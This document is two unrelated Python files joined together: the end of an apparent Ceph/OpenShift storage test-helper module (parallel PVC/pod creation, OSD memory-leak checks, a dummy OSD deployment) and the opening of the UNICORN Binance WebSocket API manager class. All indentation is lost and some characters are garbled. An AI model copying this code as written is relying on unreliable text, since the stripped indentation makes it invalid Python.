size (str): size of the pvc eg: '10Gi'
access_modes (list): List of access modes for PVC creation
Returns:
pvc_objs_list (list): List of pvc objs created in function
"""
obj_status_list, result_lists = ([] for i in range(2))
with ThreadPoolExecutor() as executor:
for mode in access_modes:
result_lists.append(
executor.submit(
create_multiple_pvcs, sc_name=sc_obj.name,
namespace=namespace, number_of_pvc=number_of_pvc,
access_mode=mode, size=size)
)
result_list = [result.result() for result in result_lists]
pvc_objs_list = converge_lists(result_list)
# Check for all the pvcs in Bound state
with ThreadPoolExecutor() as executor:
for objs in pvc_objs_list:
obj_status_list.append(
executor.submit(wait_for_resource_state, objs, 'Bound')
)
if False in [obj.result() for obj in obj_status_list]:
raise TimeoutExpiredError
return pvc_objs_list
def create_pods_parallel(pvc_list, namespace, interface, raw_block_pv=False):
"""
Function to create pods in parallel
Args:
pvc_list (list): List of pvcs to be attached in pods
namespace (str): The namespace for creating pod
interface (str): The interface backed the PVC
raw_block_pv (bool): Either RAW block or not
Returns:
pod_objs (list): Returns list of pods created
"""
future_pod_objs = []
# Added 300 sec wait time since in scale test once the setup has more
# PODs time taken for the pod to be up will be based on resource available
wait_time = 300
if raw_block_pv:
pod_dict_path = constants.CSI_RBD_RAW_BLOCK_POD_YAML
else:
pod_dict_path = None
with ThreadPoolExecutor() as executor:
for pvc_obj in pvc_list:
future_pod_objs.append(executor.submit(
create_pod, interface_type=interface,
pvc_name=pvc_obj.name, do_reload=False, namespace=namespace,
raw_block_pv=raw_block_pv, pod_dict_path=pod_dict_path)
)
pod_objs = [pvc_obj.result() for pvc_obj in future_pod_objs]
# Check for all the pods are in Running state
# In above pod creation not waiting for the pod to be created because of threads usage
with ThreadPoolExecutor() as executor:
for obj in pod_objs:
future_pod_objs.append(
executor.submit(wait_for_resource_state, obj, 'Running', timeout=wait_time)
)
# If pods not up raise exception/failure
if False in [obj.result() for obj in future_pod_objs]:
raise TimeoutExpiredError
return pod_objs
def delete_objs_parallel(obj_list):
"""
Function to delete objs specified in list
Args:
obj_list(list): List can be obj of pod, pvc, etc
Returns:
bool: True if obj deleted else False
"""
threads = list()
for obj in obj_list:
process = threading.Thread(target=obj.delete)
process.start()
threads.append(process)
for process in threads:
process.join()
return True
def memory_leak_analysis(median_dict):
"""
Function to analyse Memory leak after execution of test case
Memory leak is analyzed based on top output "RES" value of ceph-osd daemon,
i.e. list[7] in code
Args:
median_dict (dict): dict of worker nodes and respective median value
eg: median_dict = {'worker_node_1':102400, 'worker_node_2':204800, ...}
More Detail on Median value:
For calculating memory leak require a constant value, which should not be
start or end of test, so calculating it by getting memory for 180 sec
before TC execution and take a median out of it.
Memory value could be different for each nodes, so identify constant value
for each node and update in median_dict
Usage:
test_case(.., memory_leak_function):
.....
median_dict = helpers.get_memory_leak_median_value()
.....
TC execution part, memory_leak_fun will capture data
....
helpers.memory_leak_analysis(median_dict)
....
"""
# dict to store memory leak difference for each worker
diff = {}
for worker in get_worker_nodes():
memory_leak_data = []
if os.path.exists(f"/tmp/{worker}-top-output.txt"):
with open(f"/tmp/{worker}-top-output.txt", "r") as f:
data = f.readline()
list = data.split(" ")
list = [i for i in list if i]
memory_leak_data.append(list[7])
else:
logging.info(f"worker {worker} memory leak file not found")
raise UnexpectedBehaviour
number_of_lines = len(memory_leak_data) - 1
# Get the start value form median_dict arg for respective worker
start_value = median_dict[f"{worker}"]
end_value = memory_leak_data[number_of_lines]
logging.info(f"Median value {start_value}")
logging.info(f"End value {end_value}")
# Convert the values to kb for calculations
if start_value.__contains__('g'):
start_value = float(1024 ** 2 * float(start_value[:-1]))
elif start_value.__contains__('m'):
start_value = float(1024 * float(start_value[:-1]))
else:
start_value = float(start_value)
if end_value.__contains__('g'):
end_value = float(1024 ** 2 * float(end_value[:-1]))
elif end_value.__contains__('m'):
end_value = float(1024 * float(end_value[:-1]))
else:
end_value = float(end_value)
# Calculate the percentage of diff between start and end value
# Based on value decide TC pass or fail
diff[worker] = ((end_value - start_value) / start_value) * 100
logging.info(f"Percentage diff in start and end value {diff[worker]}")
if diff[worker] <= 20:
logging.info(f"No memory leak in worker {worker} passing the test")
else:
logging.info(f"There is a memory leak in worker {worker}")
logging.info(f"Memory median value start of the test {start_value}")
logging.info(f"Memory value end of the test {end_value}")
raise UnexpectedBehaviour
def get_memory_leak_median_value():
"""
Function to calculate memory leak Median value by collecting the data for 180 sec
and find the median value which will be considered as starting point
to evaluate memory leak using "RES" value of ceph-osd daemon i.e. list[7] in code
Returns:
median_dict (dict): dict of worker nodes and respective median value
"""
median_dict = {}
timeout = 180 # wait for 180 sec to evaluate memory leak median data.
logger.info(f"waiting for {timeout} sec to evaluate the median value")
time.sleep(timeout)
for worker in get_worker_nodes():
memory_leak_data = []
if os.path.exists(f"/tmp/{worker}-top-output.txt"):
with open(f"/tmp/{worker}-top-output.txt", "r") as f:
data = f.readline()
list = data.split(" ")
list = [i for i in list if i]
memory_leak_data.append(list[7])
else:
logging.info(f"worker {worker} memory leak file not found")
raise UnexpectedBehaviour
median_dict[f"{worker}"] = statistics.median(memory_leak_data)
return median_dict
def refresh_oc_login_connection(user=None, password=None):
"""
Function to refresh oc user login
Default login using kubeadmin user and password
Args:
user (str): Username to login
password (str): Password to login
"""
user = user or config.RUN['username']
if not password:
filename = os.path.join(
config.ENV_DATA['cluster_path'],
config.RUN['password_location']
)
with open(filename) as f:
password = f.read()
ocs_obj = ocp.OCP()
ocs_obj.login(user=user, password=password)
def rsync_kubeconf_to_node(node):
"""
Function to copy kubeconfig to OCP node
Args:
node (str): OCP node to copy kubeconfig if not present
"""
# ocp_obj = ocp.OCP()
filename = os.path.join(
config.ENV_DATA['cluster_path'],
config.RUN['kubeconfig_location']
)
file_path = os.path.dirname(filename)
master_list = get_master_nodes()
ocp_obj = ocp.OCP()
check_auth = 'auth'
check_conf = 'kubeconfig'
node_path = '/home/core/'
if check_auth not in ocp_obj.exec_oc_debug_cmd(node=master_list[0], cmd_list=[f"ls {node_path}"]):
ocp.rsync(
src=file_path, dst=f"{node_path}", node=node, dst_node=True
)
elif check_conf not in ocp_obj.exec_oc_debug_cmd(node=master_list[0], cmd_list=[f"ls {node_path}auth"]):
ocp.rsync(
src=file_path, dst=f"{node_path}", node=node, dst_node=True
)
def create_dummy_osd(deployment):
"""
Replace one of OSD pods with pod that contains all data from original
OSD but doesn't run osd daemon. This can be used e.g. for direct acccess
to Ceph Placement Groups.
Args:
deployment (str): Name of deployment to use
Returns:
list: first item is dummy deployment object, second item is dummy pod
object
"""
oc = OCP(
kind=constants.DEPLOYMENT,
namespace=config.ENV_DATA.get('cluster_namespace')
)
osd_data = oc.get(deployment)
dummy_deployment = create_unique_resource_name('dummy', 'osd')
osd_data['metadata']['name'] = dummy_deployment
osd_containers = osd_data.get('spec').get('template').get('spec').get(
'containers'
)
# get osd container spec
original_osd_args = osd_containers[0].get('args')
osd_data['spec']['template']['spec']['containers'][0]['args'] = []
osd_data['spec']['template']['spec']['containers'][0]['command'] = [
'/bin/bash',
'-c',
'sleep infinity'
]
osd_file = tempfile.NamedTemporaryFile(
mode='w+', prefix=dummy_deployment, delete=False
)
with open(osd_file.name, "w") as temp:
yaml.dump(osd_data, temp)
oc.create(osd_file.name)
# downscale the original deployment and start dummy deployment instead
oc.exec_oc_cmd(f"scale --replicas=0 deployment/{deployment}")
oc.exec_oc_cmd(f"scale --replicas=1 deployment/{dummy_deployment}")
osd_list = pod.get_osd_pods()
dummy_pod = [pod for pod in osd_list if dummy_deployment in pod.name][0]
wait_for_resource_state(
resource=dummy_pod,
state=constants.STATUS_RUNNING,
timeout=60
)
ceph_init_cmd = '/rook/tini' + ' ' + ' '.join(original_osd_args)
try:
logger.info('Following command should expire after 7 seconds')
dummy_pod.exec_cmd_on_pod(ceph_init_cmd, timeout=7)
except TimeoutExpired:
logger.info('Killing /rook/tini process')
try:
dummy_pod.exec_bash_cmd_on_pod(
"kill $(ps aux | grep '[/]rook/tini' | awk '{print $2}')"
)
except CommandFailed:
pass
return dummy_deployment, dummy_pod
def get_failure_domin():
"""
Function is used to getting failure domain of pool
Returns:
str: Failure domain from cephblockpool
"""
ct_pod = pod.get_ceph_tools_pod()
out = ct_pod.exec_ceph_cmd(ceph_cmd="ceph osd crush rule dump", format='json')
assert out, "Failed to get cmd output"
for crush_rule in out:
if constants.CEPHBLOCKPOOL.lower() in crush_rule.get("rule_name"):
for steps in crush_rule.get("steps"):
if "type" in steps:
return steps.get("type")
|
unicorn_binance_websocket_api_manager.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# File: unicorn_binance_websocket_api/unicorn_binance_websocket_api_manager.py
#
# Part of โUNICORN Binance WebSocket APIโ
# Project website: https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api
# Documentation: https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api
# PyPI: https://pypi.org/project/unicorn-binance-websocket-api/
#
# Author: Oliver Zehentleitner
# https://about.me/oliver-zehentleitner
#
# Copyright (c) 2019-2021, Oliver Zehentleitner
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from .unicorn_binance_websocket_api_exceptions import StreamRecoveryError, UnknownExchange
from .unicorn_binance_websocket_api_socket import BinanceWebSocketApiSocket
from .unicorn_binance_websocket_api_restclient import BinanceWebSocketApiRestclient
from .unicorn_binance_websocket_api_restserver import BinanceWebSocketApiRestServer
from cheroot import wsgi
from datetime import datetime
from flask import Flask, redirect
from flask_restful import Api
import asyncio
import colorama
import copy
import logging
import os
import platform
import psutil
import re
import requests
import sys
import threading
import time
import uuid
import json # Disable ujson
class BinanceWebSocketApiManager(threading.Thread):
"""
An unofficial Python API to use the Binance Websocket API`s (com+testnet, com-margin+testnet,
com-isolated_margin+testnet, com-futures+testnet, jersey, us, jex, dex/chain+testnet) in a easy, fast, flexible,
robust and fully-featured way.
This library supports two different kind of websocket endpoints:
- CEX (Centralized exchange): binance.com, binance.vision, binance.je, binance.us, jex.com
- DEX (Decentralized exchange): binance.org
Binance.com websocket API documentation:
- https://github.com/binance-exchange/binance-official-api-docs/blob/master/web-socket-streams.md
- https://binance-docs.github.io/apidocs/futures/en/#user-data-streams
- https://binance-docs.github.io/apidocs/spot/en/#user-data-streams
Binance.vision (Testnet) websocket API documentation:
- https://testnet.binance.vision/
Binance.je websocket API documentation:
- https://github.com/binance-jersey/binance-official-api-docs/blob/master/web-socket-streams.md
- https://github.com/binance-jersey/binance-official-api-docs/blob/master/user-data-stream.md
Binance.us websocket API documentation:
- https://github.com/binance-us/binance-official-api-docs/blob/master/web-socket-streams.md
- https://github.com/binance-us/binance-official-api-docs/blob/master/user-data-stream.md
Jex.com websocket API documentation:
- https://jexapi.github.io/api-doc/option.html#web-socket-streams
- https://jexapi.github.io/api-doc/option.html#user-data-streams
Binance.org websocket API documentation:
- https://docs.binance.org/api-reference/dex-api/ws-connection.html
:param process_stream_data: Provide a function/method to process the received webstream data. The function
will be called instead of
`add_to_stream_buffer() <unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager.BinanceWebSocketApiManager.add_to_stream_buffer>`_
like `process_stream_data(stream_data, stream_buffer_name)` where
`stream_data` cointains the raw_stream_data. If not provided, the raw stream_data will
get stored in the stream_buffer! `How to read from stream_buffer!
<https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/README.html#and-4-more-lines-to-print-the-receives>`_
:type process_stream_data: function
:param exchange: Select binance.com, binance.com-testnet, binance.com-margin, binance.com-margin-testnet,
binance.com-isolated_margin, binance.com-isolated_margin-testnet, binance.com-futures,
binance.com-futures-testnet, binance.je, binance.us, jex.com, binance.org or binance.org-testnet
(default: binance.com)
:type exchange: str
:param warn_on_update: set to `False` to disable the update warning
:type warn_on_update: bool
:param throw_exception_if_unrepairable: set to `True` to activate exceptions if a crashed stream is unrepairable
(invalid API key, exceeded subscription limit) or an unknown exchange is
used
:type throw_exception_if_unrepairable: bool
:param restart_timeout: A stream restart must be successful within this time, otherwise a new restart will be
initialized. Default is 6 seconds.
:type restart_timeout: int
:param show_secrets_in_logs: set to True to show secrets like listen_key, api_key or api_secret in log file
(default=False)
:type show_secrets_in_logs: bool
:param output_default: set to "dict" to convert the received raw data to a python dict, set to "UnicornFy" to
convert with `UnicornFy <https://github.com/oliver-zehentleitner/unicorn-fy>`_ - otherwise
with the default setting "raw_data" the output remains unchanged and gets delivered as
received from the endpoints. Change this for a specific stream with the `output` parameter
of `create_stream()` and `replace_stream()`
:type output_default: str
:param enable_stream_signal_buffer: set to True to enable the
`stream_signal_buffer <https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/%60stream_signal_buffer%60>`_
and receive information about
disconnects and reconnects to manage a restore of the lost data during the
interruption or to recognize your bot got blind.
:type enable_stream_signal_buffer: bool
"""
def __init__(self,
process_stream_data=False,
exchange="binance.com",
warn_on_update=True,
throw_exception_if_unrepairable=False,
restart_timeout=6,
show_secrets_in_logs=False,
output_default="raw_data",
enable_stream_signal_buffer=False):
threading.Thread.__init__(self)
self.name = "unicorn-binance-websocket-api"
self.version = "1.28.0.dev"
logging.info(f"New instance of {self.get_user_agent()} on {str(platform.system())} {str(platform.release())} "
f"started ...")
colorama.init()
if process_stream_data is False:
# no special method to process stream data provided, so we use add_to_stream_buffer:
self.process_stream_data = self.add_to_stream_buffer
logging.info(f"Using `stream_buffer`")
else:
# use the provided method to process stream data:
self.process_stream_data = process_stream_data
logging.info(f"Using `process_stream_data`")
self.exchange = exchange
if self.exchange == "binance.com":
self.websocket_base_uri = "wss://stream.binance.com:9443/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.com-testnet":
self.websocket_base_uri = "wss://testnet.binance.vision/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.com-margin":
self.websocket_base_uri = "wss://stream.binance.com:9443/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.com-margin-testnet":
self.websocket_base_uri = "wss://testnet.binance.vision/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.com-isolated_margin":
self.websocket_base_uri = "wss://stream.binance.com:9443/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.com-isolated_margin-testnet":
self.websocket_base_uri = "wss://testnet.binance.vision/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.com-futures":
self.websocket_base_uri = "wss://fstream.binance.com/"
self.max_subscriptions_per_stream = 200
elif self.exchange == "binance.com-futures-testnet":
self.websocket_base_uri = "wss://stream.binancefuture.com/"
self.max_subscriptions_per_stream = 200
elif self.exchange == "binance.je":
self.websocket_base_uri = "wss://stream.binance.je:9443/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.us":
self.websocket_base_uri = "wss://stream.binance.us:9443/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "jex.com":
self.websocket_base_uri = "wss://ws.jex.com/"
self.max_subscriptions_per_stream = 10
elif self.exchange == "binance.org":
self.websocket_base_uri = "wss://dex.binance.org/api/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.org-testnet":
self.websocket_base_uri = "wss://testnet-dex.binance.org/api/"
self.max_subscriptions_per_stream = 1024
else:
# Unknown Exchange
error_msg = f"Unknown exchange '{str(self.exchange)}'! Read the docs to see a list of supported " \
"exchanges: https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_" \
"binance_websocket_api.html#module-unicorn_binance_websocket_api.unicorn_binance_websocket_" \
"api_manager"
logging.critical(error_msg)
raise UnknownExchange(error_msg)
self.stop_manager_request = None
self.all_subscriptions_number = 0
self.binance_api_status = {'weight': None,
'timestamp': 0,
'status_code': None}
self.dex_user_address = False
self.enable_stream_signal_buffer = enable_stream_signal_buffer
self.frequent_checks_list = {}
self.frequent_checks_list_lock = threading.Lock()
self.receiving_speed_average = 0
self.receiving_speed_peak = {'value': 0,
'timestamp': time.time()}
self.keep_max_received_last_second_entries = 5
self.keepalive_streams_list = {}
self.last_entry_added_to_stream_buffer = 0
self.last_monitoring_check = time.time()
self.last_update_check_github = {'timestamp': time.time(),
'status': None}
self.last_update_check_github_check_command = {'timestamp': time.time(),
'status': None}
self.max_send_messages_per_second = 5
self.max_send_messages_per_second_reserve = 2
self.most_receives_per_second = 0
self.monitoring_api_server = False
self.monitoring_total_received_bytes = 0
self.monitoring_total_receives = 0
self.output_default = output_default
self.reconnects = 0
self.reconnects_lock = threading.Lock()
self.request_id = 0
self.request_id_lock = threading.Lock()
self.restart_requests = {}
self.restart_timeout = restart_timeout
self.ringbuffer_error = []
self.ringbuffer_error_max_size = 500
self.ringbuffer_result = []
self.ringbuffer_result_max_size = 500
self.show_secrets_in_logs = show_secrets_in_logs
self.start_time = time.time()
self.stream_buffer = []
self.stream_buffer_lock = threading.Lock()
self.stream_buffer_locks = {}
self.stream_buffers = {}
self.stream_list = {}
self.stream_list_lock = threading.Lock()
self.stream_signal_buffer = []
self.stream_signal_buffer_lock = threading.Lock()
self.stream_threading_lock = {}
self.throw_exception_if_unrepairable = throw_exception_if_unrepairable
self.total_received_bytes = 0
self.total_received_bytes_lock = threading.Lock()
self.total_receives = 0
self.total_receives_lock = threading.Lock()
self.total_transmitted = 0
self.total_transmitted_lock = threading.Lock()
self.websocket_list = {}
self.start()
self.replaced_secrets_text = "***SECRET_REMOVED***"
self.restclient = BinanceWebSocketApiRestclient(self)
if warn_on_update and self.is_update_availabe():
update_msg = f"Release {self.name}_" + self.get_latest_version() + " is available, " \
"please consider updating! (Changelog: https://github.com/oliver-zehentleitner/unicorn-" \
"binance-websocket-api/blob/master/CHANGELOG.md)"
print(update_msg)
logging.warning(update_msg)
def _add_stream_to_stream_list(self,
stream_id,
channels,
markets,
stream_label=None,
stream_buffer_name=False,
api_key=False,
api_secret=False,
symbols=False,
output=False,
ping_interval=False,
ping_timeout=False,
close_timeout=False):
"""
Create a list entry for new streams
:param stream_id: provide a stream_id (only needed for userData Streams (acquiring a listenKey)
:type stream_id: uuid
:param channels: provide the channels to create the URI
:type channels: str, tuple, list, set
:param markets: provide the markets to create the URI
:type markets: str, tuple, list, set
:param stream_label: provide a stream_label for the stream
:type stream_label: str
:param stream_buffer_name: If `False` the data is going to get written to the default stream_buffer,
set to `True` to read the data via `pop_stream_data_from_stream_buffer(stream_id)` or
provide a string to create and use a shared stream_buffer and read it via
`pop_stream_data_from_stream_buffer('string')`.
:type stream_buffer_name: bool or str
:param api_key: provide a valid Binance API key
:type api_key: str
:param api_secret: provide a valid Binance API secret
:type api_secret: str
:param symbols: provide the symbols for isolated_margin user_data streams
:type symbols: str
:param output: the default setting `raw_data` can be globaly overwritten with the parameter
`output_default <https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_binance_websocket_api.html?highlight=output_default#module-unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager>`_
of BinanceWebSocketApiManager`. To overrule the `output_default` value for this specific stream,
set `output` to "dict" to convert the received raw data to a python dict, set to "UnicornFy" to
convert with `UnicornFy <https://github.com/oliver-zehentleitner/unicorn-fy>`_ - otherwise with
the default setting "raw_data" the output remains unchanged and gets delivered as received from
the endpoints
:param ping_interval: Once the connection is open, a `Ping frame` is sent every
`ping_interval` seconds. This serves as a keepalive. It helps keeping
the connection open, especially in the presence of proxies with short
timeouts on inactive connections. Set `ping_interval` to `None` to
disable this behavior. (default: 20)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type ping_interval: int or None
:param ping_timeout: If the corresponding `Pong frame` isn't received within
`ping_timeout` seconds, the connection is considered unusable and is closed with
code 1011. This ensures that the remote endpoint remains responsive. Set
`ping_timeout` to `None` to disable this behavior. (default: 20)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type ping_timeout: int or None
:param close_timeout: The `close_timeout` parameter defines a maximum wait time in seconds for
completing the closing handshake and terminating the TCP connection. (default: 10)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type close_timeout: int or None
:type output: str
"""
if output is False:
output = self.output_default
self.stream_threading_lock[stream_id] = {'full_lock': threading.Lock(),
'receives_statistic_last_second_lock': threading.Lock()}
self.stream_list[stream_id] = {'exchange': self.exchange,
'stream_id': copy.deepcopy(stream_id),
'recent_socket_id': None,
'channels': copy.deepcopy(channels),
'markets': copy.deepcopy(markets),
'stream_label': copy.deepcopy(stream_label),
'stream_buffer_name': copy.deepcopy(stream_buffer_name),
'symbols': copy.deepcopy(symbols),
'output': copy.deepcopy(output),
'subscriptions': 0,
'payload': [],
'api_key': copy.deepcopy(api_key),
'api_secret': copy.deepcopy(api_secret),
'dex_user_address': copy.deepcopy(self.dex_user_address),
'ping_interval': copy.deepcopy(ping_interval),
'ping_timeout': copy.deepcopy(ping_timeout),
'close_timeout': copy.deepcopy(close_timeout),
'status': 'starting',
'start_time': time.time(),
'processed_receives_total': 0,
'receives_statistic_last_second': {'most_receives_per_second': 0, 'entries': {}},
'seconds_to_last_heartbeat': None,
'last_heartbeat': None,
'kill_request': None,
'stop_request': None,
'crash_request': None,
'seconds_since_has_stopped': None,
'has_stopped': False,
'reconnects': 0,
'logged_reconnects': [],
'processed_transmitted_total': 0,
'last_static_ping_listen_key': 0,
'listen_key': False,
'listen_key_cache_time': 30 * 60,
'last_received_data_record': None,
'processed_receives_statistic': {},
'transfer_rate_per_second': {'bytes': {}, 'speed': 0}}
logging.info("BinanceWebSocketApiManager._add_stream_to_stream_list(" +
str(stream_id) + ", " + str(channels) + ", " + str(markets) + ", " + str(stream_label) + ", "
+ str(stream_buffer_name) + ", " + str(symbols) + ")")
def _create_stream_thread(self,
loop,
stream_id,
channels,
markets,
stream_buffer_name=False,
restart=False):
"""
Co function of self.create_stream to create a thread for the socket and to manage the coroutine
:param loop: provide a asynio loop
:type loop: asyncio loop
:param stream_id: provide a stream_id (only needed for userData Streams (acquiring a listenKey)
:type stream_id: uuid
:param channels: provide the channels to create the URI
:type channels: str, tuple, list, set
:param markets: provide the markets to create the URI
:type markets: str, tuple, list, set
:param stream_buffer_name: If `False` the data is going to get written to the default stream_buffer,
set to `True` to read the data via `pop_stream_data_from_stream_buffer(stream_id)` or
provide a string to create and use a shared stream_buffer and read it via
`pop_stream_data_from_stream_buffer('string')`.
:type stream_buffer_name: bool or str
:param restart: set to `True`, if its a restart!
:type restart: bool
:return:
"""
if self.is_stop_request(stream_id):
return False
if restart is False:
if stream_buffer_name is not False:
self.stream_buffer_locks[stream_buffer_name] = threading.Lock()
try:
# Not resetting the stream_buffer during a restart:
if self.stream_buffers[stream_buffer_name]:
pass
except KeyError:
self.stream_buffers[stream_buffer_name] = []
asyncio.set_event_loop(loop)
socket = BinanceWebSocketApiSocket(self, stream_id, channels, markets)
try:
loop.run_until_complete(socket.start_socket())
except RuntimeError as error_msg:
if "cannot schedule new futures after interpreter shutdown" in str(error_msg):
logging.critical(f"BinanceWebSocketApiManager._create_stream_thread() stream_id={str(stream_id)} "
f" - RuntimeError error_msg: - {str(error_msg)} - stopping and shutting down - read "
f"https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/issues/131"
f" for further information!")
self.stop_manager_with_all_streams()
sys.exit(1)
logging.critical(f"BinanceWebSocketApiManager._create_stream_thread() stream_id={str(stream_id)} "
f"error: 7 - {str(error_msg)} - if this stream did not restart after this error, please "
f"create an issue: "
f"https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/issues/new/choose")
loop.close()
finally:
self.add_to_stream_signal_buffer("DISCONNECT", stream_id)
loop.close()
def _frequent_checks(self):
"""
This method gets started as a thread and is doing the frequent checks
"""
frequent_checks_id = time.time()
cpu_usage_time = False
with self.frequent_checks_list_lock:
self.frequent_checks_list[frequent_checks_id] = {'last_heartbeat': 0,
'stop_request': None,
'has_stopped': False}
logging.info("BinanceWebSocketApiManager._frequent_checks() new instance created with frequent_checks_id=" +
str(frequent_checks_id))
# threaded loop for min 1 check per second
while self.stop_manager_request is None and self.frequent_checks_list[frequent_checks_id]['stop_request'] \
is None:
with self.frequent_checks_list_lock:
self.frequent_checks_list[frequent_checks_id]['last_heartbeat'] = time.time()
time.sleep(0.3)
current_timestamp = int(time.time())
last_timestamp = current_timestamp - 1
next_to_last_timestamp = current_timestamp - 2
total_most_stream_receives_last_timestamp = 0
total_most_stream_receives_next_to_last_timestamp = 0
active_stream_list = self.get_active_stream_list()
# check CPU stats
cpu = self.get_process_usage_cpu()
if cpu >= 95:
time_of_waiting = 5
if cpu_usage_time is False:
cpu_usage_time = time.time()
elif (time.time() - cpu_usage_time) > time_of_waiting:
logging.warning(f"BinanceWebSocketApiManager._frequent_checks() - High CPU usage since "
f"{str(time_of_waiting)} seconds: {str(cpu)}")
cpu_usage_time = False
else:
cpu_usage_time = False
# count most_receives_per_second total last second
if active_stream_list:
for stream_id in active_stream_list:
# set the streams `most_receives_per_second` value
try:
if self.stream_list[stream_id]['receives_statistic_last_second']['entries'][last_timestamp] > \
self.stream_list[stream_id]['receives_statistic_last_second']['most_receives_per_second']:
self.stream_list[stream_id]['receives_statistic_last_second']['most_receives_per_second'] = \
self.stream_list[stream_id]['receives_statistic_last_second']['entries'][last_timestamp]
except KeyError:
pass
try:
total_most_stream_receives_last_timestamp += self.stream_list[stream_id]['receives_statistic_last_second']['entries'][last_timestamp]
except KeyError:
pass
try:
total_most_stream_receives_next_to_last_timestamp += self.stream_list[stream_id]['receives_statistic_last_second']['entries'][next_to_last_timestamp]
except KeyError:
pass
# delete list entries older than `keep_max_received_last_second_entries`
# receives_statistic_last_second
delete_index = []
if len(self.stream_list[stream_id]['receives_statistic_last_second']['entries']) > \
self.keep_max_received_last_second_entries:
with self.stream_threading_lock[stream_id]['receives_statistic_last_second_lock']:
temp_entries = copy.deepcopy(self.stream_list[stream_id]['receives_statistic_last_second']['entries'])
for timestamp_key in temp_entries:
try:
if timestamp_key < current_timestamp - self.keep_max_received_last_second_entries:
delete_index.append(timestamp_key)
except ValueError as error_msg:
logging.error(
"BinanceWebSocketApiManager._frequent_checks() timestamp_key=" + str(timestamp_key) +
" current_timestamp=" + str(current_timestamp) + " keep_max_received_last_second_"
"entries=" + str(self.keep_max_received_last_second_entries) + " error_msg=" +
str(error_msg))
for timestamp_key in delete_index:
with self.stream_threading_lock[stream_id]['receives_statistic_last_second_lock']:
self.stream_list[stream_id]['receives_statistic_last_second']['entries'].pop(timestamp_key,
None)
# transfer_rate_per_second
delete_index = []
if len(self.stream_list[stream_id]['transfer_rate_per_second']['bytes']) > \
self.keep_max_received_last_second_entries:
try:
temp_bytes = self.stream_list[stream_id]['transfer_rate_per_second']['bytes']
for timestamp_key in temp_bytes:
try:
if timestamp_key < current_timestamp - self.keep_max_received_last_second_entries:
delete_index.append(timestamp_key)
except ValueError as error_msg:
logging.error(
"BinanceWebSocketApiManager._frequent_checks() timestamp_key="
+ str(timestamp_key) +
" current_timestamp=" + str(current_timestamp) +
" keep_max_received_last_second_"
"entries=" + str(self.keep_max_received_last_second_entries) + " error_msg=" +
str(error_msg))
except RuntimeError as error_msg:
logging.info("BinanceWebSocketApiManager._frequent_checks() - "
"Catched RuntimeError: " + str(error_msg))
for timestamp_key in delete_index:
self.stream_list[stream_id]['transfer_rate_per_second']['bytes'].pop(timestamp_key, None)
# set most_receives_per_second
try:
if int(self.most_receives_per_second) < int(total_most_stream_receives_last_timestamp):
self.most_receives_per_second = int(total_most_stream_receives_last_timestamp)
except ValueError as error_msg:
logging.error("BinanceWebSocketApiManager._frequent_checks() self.most_receives_per_second"
"=" + str(self.most_receives_per_second) + " total_most_stream_receives_last_timestamp"
"=" + str(total_most_stream_receives_last_timestamp) + " total_most_stream_receives_next_"
"to_last_timestamp=" + str(total_most_stream_receives_next_to_last_timestamp) + " error_"
"msg=" + str(error_msg))
# check receiving_speed_peak
last_second_receiving_speed = self.get_current_receiving_speed_global()
try:
if last_second_receiving_speed > self.receiving_speed_peak['value']:
self.receiving_speed_peak['value'] = last_second_receiving_speed
self.receiving_speed_peak['timestamp'] = time.time()
logging.info(f"BinanceWebSocketApiManager._frequent_checks() - reached new "
f"`highest_receiving_speed` "
f"{str(self.get_human_bytesize(self.receiving_speed_peak['value'], '/s'))} at "
f"{self.get_date_of_timestamp(self.receiving_speed_peak['timestamp'])}")
except TypeError as error_msg:
pass
# send keepalive for `!userData` streams every 30 minutes
if active_stream_list:
for stream_id in active_stream_list:
if isinstance(active_stream_list[stream_id]['markets'], str):
active_stream_list[stream_id]['markets'] = [active_stream_list[stream_id]['markets'], ]
if isinstance(active_stream_list[stream_id]['channels'], str):
active_stream_list[stream_id]['channels'] = [active_stream_list[stream_id]['channels'], ]
